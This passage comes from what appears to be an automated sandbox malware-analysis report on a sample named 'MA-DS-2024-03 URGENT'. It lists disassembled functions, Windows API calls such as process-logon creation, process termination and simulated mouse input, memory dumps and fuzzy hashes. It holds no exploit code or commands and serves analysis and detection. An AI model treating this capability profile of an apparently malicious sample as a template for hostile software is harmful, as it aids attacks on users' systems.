                                                        • _memmove.LIBCMT ref: 0045EFFD
                                                        • VariantClear.OLEAUT32(?), ref: 0045F04A
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                        • String ID:
                                                        • API String ID: 1101466143-0
                                                        • Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                                        • Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
                                                        • Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                                        • Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94
                                                        Function 0046220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00462258
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
                                                        • IsMenu.USER32(00000000), ref: 004622C3
                                                        • CreatePopupMenu.USER32 ref: 004622F7
                                                        • GetMenuItemCount.USER32(000000FF), ref: 00462355
                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                        • String ID:
                                                        • API String ID: 3311875123-0
                                                        • Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                        • Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
                                                        • Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                        • Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B
                                                        Function 0047709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC
                                                          • Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3
                                                        • GetDesktopWindow.USER32 ref: 004770D6
                                                        • GetWindowRect.USER32(00000000), ref: 004770DD
                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F
                                                          • Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                        • GetCursorPos.USER32(?), ref: 0047713B
                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                        • String ID:
                                                        • API String ID: 4137160315-0
                                                        • Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                                        • Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
                                                        • Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                                        • Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A
                                                        Function 00458879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                          • Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                          • Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                          • Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                          • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                        • GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
                                                        • HeapAlloc.KERNEL32(00000000), ref: 004588DD
                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
                                                        • HeapFree.KERNEL32(00000000), ref: 00458911
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                        • String ID:
                                                        • API String ID: 3008561057-0
                                                        • Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                        • Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
                                                        • Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                        • Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69
                                                        Function 004585B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
                                                        • CloseHandle.KERNEL32(00000004), ref: 00458603
                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                        • String ID:
                                                        • API String ID: 1413079979-0
                                                        • Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                        • Instruction ID: 159165bab53b04d3cbba9e0d8ed23f629fb96fbb8b96a1f823f3c86320dce82d
                                                        • Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                        • Instruction Fuzzy Hash: 7111597250120DBBDF018FA4DD49BEF7BA9EF08305F144069FE04A2161CB769E69EB64
                                                        Function 016B185B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_free$_abort
                                                        • String ID:
                                                        • API String ID: 3160817290-0
                                                        • Opcode ID: 5fe81c8c3265f0987d5b5a41027f32d70a249c20e2cfd1b09fbfaf4e5daf5913
                                                        • Instruction ID: 06d40485f0eb7e7f0d0eeea5c2376c200c85ff20ad0c194d9d45087eb34df926
                                                        • Opcode Fuzzy Hash: 5fe81c8c3265f0987d5b5a41027f32d70a249c20e2cfd1b09fbfaf4e5daf5913
                                                        • Instruction Fuzzy Hash: 73F0F9321406023AC32222797CF4EFA1697ABD7661F26413DF515D6385EF3188D2C318
                                                        Function 00420162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Virtual
                                                        • String ID:
                                                        • API String ID: 4278518827-0
                                                        • Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                        • Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
                                                        • Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                        • Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5
                                                        Function 004653E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 839392675-0
                                                        • Opcode ID: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                        • Instruction ID: 8521796c5e9ebcca20b77e734ec20d152baa00e403791343a5e797bd2ed800e1
                                                        • Opcode Fuzzy Hash: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                        • Instruction Fuzzy Hash: 7EF06231240558BBD3215B929C0DEAF7A7CEFC6B11F00057DF904D1050EBA41A0587B9
                                                        Function 00467230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00467243
                                                        • EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E
                                                          • Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
                                                        • LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 3495660284-0
                                                        • Opcode ID: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                                        • Instruction ID: 24fb6cd7f7b8029ee4f25158e92bed301f8e8da2948c51d11c28ada49318010c
                                                        • Opcode Fuzzy Hash: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                                        • Instruction Fuzzy Hash: DDF08236540A12EBD7111B64ED4C9DF7739FF45702B1009BAF503A10A0DB7F5819CB59
                                                        Function 00458992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
                                                        • UnloadUserProfile.USERENV(?,?), ref: 004589A9
                                                        • CloseHandle.KERNEL32(?), ref: 004589B2
                                                        • CloseHandle.KERNEL32(?), ref: 004589BA
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
                                                        • HeapFree.KERNEL32(00000000), ref: 004589CA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                        • String ID:
                                                        • API String ID: 146765662-0
                                                        • Opcode ID: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                                        • Instruction ID: 8deadb4208ce055a946e280c670b0e99f3db2db319c6731f307d9ea981cf4585
                                                        • Opcode Fuzzy Hash: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                                        • Instruction Fuzzy Hash: 94E0C236004401FBDA011FE1EC0C90ABB69FB89322B108A38F219C1074CB32A828DB58
                                                        Function 00457530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 004576EA
                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457702
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457727
                                                        • _memcmp.LIBCMT ref: 00457748
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FromProg$FreeTask_memcmp
                                                        • String ID: ,,I
                                                        • API String ID: 314563124-4163367948
                                                        • Opcode ID: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
                                                        • Instruction ID: be765e1d57b8148d1cf66b3d68047348fb9be163096bbb02cdfcec4a4c199039
                                                        • Opcode Fuzzy Hash: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
                                                        • Instruction Fuzzy Hash: 08815D71A00109EFCB00DFA4D984EEEB7B9FF89315F204469F505AB251DB75AE0ACB64
                                                        Function 004785ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00478613
                                                        • CharUpperBuffW.USER32(?,?), ref: 00478722
                                                        • VariantClear.OLEAUT32(?), ref: 0047889A
                                                          • Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
                                                          • Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
                                                          • Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                        • API String ID: 4237274167-1221869570
                                                        • Opcode ID: b79f97b11a7d6962d372d0a4ccb284e4fc5bcf694c6e8e9d1ab55c8386d04fc1
                                                        • Instruction ID: 60eff2204552638baa50968c5b1ec12482493ff8819337d84e8636a8f0030324
                                                        • Opcode Fuzzy Hash: b79f97b11a7d6962d372d0a4ccb284e4fc5bcf694c6e8e9d1ab55c8386d04fc1
                                                        • Instruction Fuzzy Hash: E1916D756043019FC710EF25C48499BB7E4EF89718F14896EF88A9B3A2DB34ED06CB56
                                                        Function 00462A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                        • _memset.LIBCMT ref: 00462B87
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                        • String ID: 0
                                                        • API String ID: 4152858687-4108050209
                                                        • Opcode ID: eb943b9b2bd9ab7df12d7fb8541c6f61320b84d3e63b72e46419b12da698adb2
                                                        • Instruction ID: 8d65d54c91bb2834d650baaa5c58db0a2d3f708132dab7008ae6ceb83fe6ffca
                                                        • Opcode Fuzzy Hash: eb943b9b2bd9ab7df12d7fb8541c6f61320b84d3e63b72e46419b12da698adb2
                                                        • Instruction Fuzzy Hash: BF51DD71208B01AED7249E28DA44A6F77E8EF44314F040A2FF880D7291EBB8DC44875B
                                                        Function 00413137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
